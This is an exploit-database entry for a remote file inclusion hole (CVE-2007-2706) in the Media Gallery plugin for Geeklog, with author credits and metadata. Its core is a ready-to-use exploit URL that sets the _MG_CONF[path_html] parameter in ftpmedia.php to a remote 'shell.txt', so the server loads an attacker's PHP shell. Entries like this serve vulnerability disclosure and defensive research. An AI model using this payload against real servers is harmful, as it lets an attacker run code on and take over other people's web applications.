Media Gallery for Geeklog 1.4.8a - Remote File Inclusion

Author: ThE TiGeR
type: webapps
platform: php
port: 
date_added: 2007-05-13 
date_updated:  
verified: 1 
codes: OSVDB-36239;CVE-2007-2706 
tags: 
aliases:  
screenshot_url:  
application_url: 

#Media Gallery =>v1.4 Remote file inclusion

#Download script : http://switch.dl.sourceforge.net/sourceforge/mediagallery/mediagallery-1.4.6-1.3.11.tar.gz

#Thanks Str0ke

#Exploit :

#http://victime.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[com]

# milw0rm.com [2007-05-14]